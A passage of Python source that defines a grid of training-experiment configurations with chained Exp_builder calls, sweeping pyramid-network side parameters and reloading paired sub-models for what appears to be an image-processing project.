ch032_1side_6__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
